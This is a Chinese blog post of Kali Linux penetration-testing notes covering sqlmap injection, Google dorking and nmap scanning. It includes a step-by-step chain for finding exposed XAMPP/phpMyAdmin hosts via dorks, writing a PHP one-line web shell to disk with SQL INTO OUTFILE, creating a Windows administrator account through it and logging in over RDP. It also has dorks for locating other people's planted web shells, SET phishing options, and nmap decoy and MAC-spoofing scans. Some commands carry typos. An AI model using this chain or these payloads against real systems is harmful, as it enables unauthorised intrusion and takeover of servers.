kali linux web渗透测试学习笔记

  1. 云栖社区>
  2. 博客>
  3. 正文

kali linux web渗透测试学习笔记

花米徐 2017-10-31 09:24:38 浏览1973
展开阅读全文

   

kali linux web渗透测试学习笔记

metasploit使用方法:

启动:

第一步:启用Postgresql服务。service postgresql start

第二步:启用metasploit服务。service matasploit start

第三步:启动框架。msfconsole

一个ASP站点的sql注入

测试数字型注入点

1.网址:aspID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess

2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user

sqlmap拆解数据库和表名

拆解表名

命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。

dump表数据

1.拆解一个表的列名

命令:sqlmap -u 目标网址 -T 表名 --columns

2.得到感兴趣的字段的值

命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump

登录后台

找到登录按钮

教训:数据库密码一定要加密!

一个PHP站点的sql注入

测试数字型注入点

index.php?id=1,同上,得到数据库为mysql

sqlmap拆解数据库和表名

1.扫描数据库

命令:sqlmap -u 目标网址 --dbs --current-user

2.扫描某个数据库的表

命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择

dump表数据

查看表字段

同上

利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台

命令:nikto -host 目标网站

将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage

提升管理员权限:

fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddlerauto),将返回结果保存在本地。

返回页面

Google hack实战

能做到的事:

1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息;

2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

3.后门查找

4.关于Google hack database

Google hack语法查询:http://www.xuanhun521.com

寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板

1.inurl:8080 intitle:"Dashboard [Jenkins]"     造成源代码泄露

综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

寻找安装xampp的主机:inurl:"xampp/index"  intext:"XAMPP for Windows"

1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysqlroot权限插入一句话木马提取,获取服务器管理权限

1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户

2>>连接网站的mysql服务器

          命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码

         use mysql

3>>创建表

4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行

命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>')

5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径

6>>访问这个网站地址。........../aa.php

7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦

8>>接下来创建账号cmd=net user 小明 123456 /add  ,创建成功!

9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add

10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456

后门查找

Google搜索目标:intitle:"=[1n73ct10n privat shell]="

intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]

关于google hack database

http://www.exploit-db.com/google-dorks/

SET,社会工程学工具集

SET是开源的社会工程学利用套件,通常结合metasploit来使用,项目地址:http://github.com/trustedsec/social-engineer-toolkit

进入kali,用命令setoolkit启动,选1。攻击方法:

鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击

 

nmap

主机扫描:

namp -sL 103.10.87.1-255 列表扫描

nmap -PE  IP

nmap -Pn IP(不适用ping扫描,更适用于Internet)

nmap -sP IP(快速ping扫描),用来快速发现存活主机

-sn参数,只探测存活主机,不管端口啥的

尝试多种扫描方式,来扫描主机

端口扫描:

nmap -sS IP

nmap -sT IP ;TCP端口扫描

nmap -sU IP; UDP端口扫描

nmap -sU -p 80,445 IP ;指定端口

nmap -sT -v IP启用细节模式

操作系统探测:

参数:

-O(启用操作系统检测)

-osscan-limit(针对指定的目标进行操作系统检测)

--osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用)

示例:

nmap -sT -O IP

nmap -sT -p 3390 -O --osscan-limit IP  (只有打开3390端口,才进行操作系统版本探测)

namp -sA -O IP

服务程序探测:

nmap -sA -sV IP  扫描方式ACK ;扫描某台主机的服务程序

nmap -sV -p 22,53,110           ;扫描某个服务的服务程序

nmap高级用法:

nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的

nmap -e 08:00:27:47:63:E6 IP(指定macIP地址)(本地有多个网络接口时

nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的

nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址)

nmap -sV --source-port 900 IP --source-port(指定源端口)

nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器)

nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议)

nmap -O -F -n 103.10.87.148(-F快速扫描扫描常见的端口

nmap --script=brute 103.10.87.148(暴力破解)

参考资料:http://drops.wooyun.org/tips/2188

zmap

专注于网络端口的扫描

官方站点:http://zmap.io/

源码:https://github.com/zmap/zmap

zmap安装及使用:链接:http://pan.baidu.com/s/1bp7ddhl 密码:ypbr   pan 百度云盘)

默认情况使用SYN扫描方式

网友评论

登录后评论
0/500
评论
花米徐
+ 关注